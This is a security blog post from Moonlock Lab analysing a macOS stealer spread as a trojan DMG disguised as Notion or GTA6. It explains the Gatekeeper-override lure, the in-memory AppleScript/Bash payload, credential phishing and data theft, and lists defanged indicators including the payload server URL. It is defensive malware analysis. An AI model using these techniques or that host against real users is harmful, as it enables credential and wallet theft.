Moonlock Lab

macOS stealer found camouflaged in an Apple/Bash payload

Mykhailo Hrebeniuk

Mar 28, 20244 min read

macOS stealer found camouflaged in an Apple/Bash payload: Header image

In the ever-evolving landscape of cybersecurity threats, macOS users now face a new danger. This time, it comes in the form of a DMG trojan involving a partially obfuscated AppleScript and Bash payload hosted on a remote server.

Examined by researchers at Moonlock Lab, these malicious pieces of software pose a significant risk to the security and privacy of unsuspecting users. This article delves into the threats posed by the Apple/Bash payload, the trojan’s modus operandi, and the potential consequences for macOS users.

The origins of the AppleScript and Bash payload

Our journey began with the discovery of several new samples of a noteworthy macOS stealer. Among them, one variant stood out, exhibiting a level of sophistication that demanded immediate attention.

This variant, a partially obfuscated AppleScript and Bash payload, was detected only by Avast and AVG on VirusTotal. This sample was related to a known variant of password stealing ware (PSW), highlighting the evolving tactics employed by cybercriminals to compromise user security.

This malware is just the most recent step taken by threat actors to infiltrate macOS systems. As we delved deeper, we traced its origins and exposed a web of deception.

Screenshot of the page where a partially obfuscated AppleScript and Bash payload is being stored

The propagation of infection by this stealer originated from a malicious trojan file packed in a DMG format, possibly disseminated to unsuspecting macOS users via phishing URLs.

Although the primary sources have become inaccessible, the compiled inventory of trojan DMG files provides illuminating insights. These files assumed the guise of well-known applications such as Notion and GTA6. This social engineering trick exploits the trust engendered by familiar nomenclature to deceive users and trick them into downloading malware.

Image of a partially obfuscated AppleScript and Bash payload connections

As we unraveled the intricate web of deception, we discovered that the very IP address associated with the obfuscated AppleScript and Bash payload is entangled with over 100 phishing and malware URLs.

An image of connections of IP addresses associated with the obfuscated AppleScript and Bash payload

Exploring the infection chain, we noticed that it begins with a malicious trojan DMG file. Upon execution, it unleashes a Mach-O file named AppleApp.

Subsequently, AppleApp initiates a GET request to a specific URL, which originates from a Russian IP address. Upon successful connection, it downloads a partially obfuscated AppleScript and Bash payload. This payload is directly executed from application memory, bypassing the file system.

An image of the AppleBash infection chain diagram

How the recently discovered macOS stealer works

Let’s take a closer look at the example with the trojan DMG file named “App_v1.0.4.dmg,” initially spotted on March 19, 2024.

Disguised as a harmless DMG file, it tricks the user into installation via a phishing image, persuading the user to bypass macOS’s Gatekeeper security feature. Gatekeeper normally prevents unsigned and un-notarized applications from running, but the malware exploits a user override feature. This Gatekeeper user override allows the trojan to evade detection.

An image of the Gatekeeper bypass trick

Upon execution, the DMG file releases AppleApp, a Mach-O file embodying the same unsigned attributes. Its malicious purpose is to download a partially obfuscated AppleScript and Bash payload from https[:]//79[.]137[.]192[.]4[:]443/strings and execute it in the Mac’s memory.

This script acts as a digital pickpocket, adeptly extracting credentials and targeting sensitive data repositories across various applications and databases on the victim’s Mac.

A snippet showing the request payload from remote host
A snippet showing getting and splitting the payload by delimiter '#' for future running by the system calls

When this script runs, the payload sneakily employs a multi-faceted approach to achieve its malicious objectives:

  • Phishing for credentials
  • Targeting sensitive data
  • System profiling
  • Data exfiltration

Phishing for credentials

Leveraging deceptive dialog prompts, the malware tricks users into revealing their passwords under the guise of installing a helper application, exploiting human trust.

A snippet of the malware artifacts, showing Phishing for Credentials

Targeting sensitive data

With precision, the malware hunts through system directories, looking for valuable data such as cookies, form history, and login credentials from popular web browsers including Chrome, Firefox, Brave, Edge, Opera, and OperaGX. Additionally, it seeks the recent servers list from FileZilla, macOS Keychain databases, and the wallets of cryptocurrencies.

A snippet of the malware artifacts, showing Targeting Sensitive Data

System profiling

Through the execution of system_profiler commands, AppleApp meticulously gathers detailed information about users’ hardware and software configurations, aiding in its malicious activities.

A snippet of the malware artifacts, showing System Profiling

Data exfiltration

Employing sophisticated AppleScript commands, the malware establishes a secret folder within users’ home directories. This mechanism allows the stealer to siphon off collected data for unauthorized exfiltration.

A snippet of the malware artifacts, showing Data Exfiltration Mechanism

How to stay safe from macOS stealers

This tale is a cautionary one, a reminder that vigilance is the price of security in our digital world. To stay safe from trojans and stealers, users should:

  • Exercise caution when downloading: Always be vigilant when downloading files from the internet, especially from untrusted sources. Verify the legitimacy of the source before proceeding with the download.
  • Do not follow installation instructions to bypass Gatekeeper: Under no circumstances should users follow instructions to bypass Gatekeeper, a fundamental security feature of macOS. Always keep Gatekeeper enabled to maintain the integrity of your system’s defenses against unauthorized and potentially harmful applications.
  • Beware of social engineering tactics: Be wary of unexpected system prompts or requests for sensitive information. Cybercriminals often use social engineering tactics to trick users into divulging personal data.
  • Use security software and keep it up to date: Keep your security software up to date. This helps protect you from the latest threats and vulnerabilities.

Indicators of compromise (IOC)

IndicatorsIndicator TypeDescription
511a01dcb0fe86c9f2f432400a28487d53e83cdb03af7701f28511f260eb1a83SHA256AppleScript and Bash payload
b575ff5af6ea232b74fba11893d2f861de3ccc56f5a983dbe54aa5162f480cd2SHA256Trojan DMG
3aa1dd8ef5c19901af7c50f32e25a047f5fcc30d76ca6dca3068605817db5e34SHA256Malware macho
79[.]137[.]192[.]4[:]443IPIP address associated with AppleScript and Bash payload, Phishing Sites
https[:]//79[.]137[.]192[.]4[:]443/stringsURLURL where AppleScript and Bash payload being stored

This is an independent publication, and it has not been authorized, sponsored, or otherwise approved by Apple Inc. Mac, macOS, and AppleScript are trademarks of Apple Inc.

Mykhailo Hrebeniuk Mykhailo Hrebeniuk
Mykhailo is a macOS security researcher specializing in malware analysis, data analysis, and developing tools. He previously worked as a software developer with embedded Linux and networking, specializing in vulnerability research.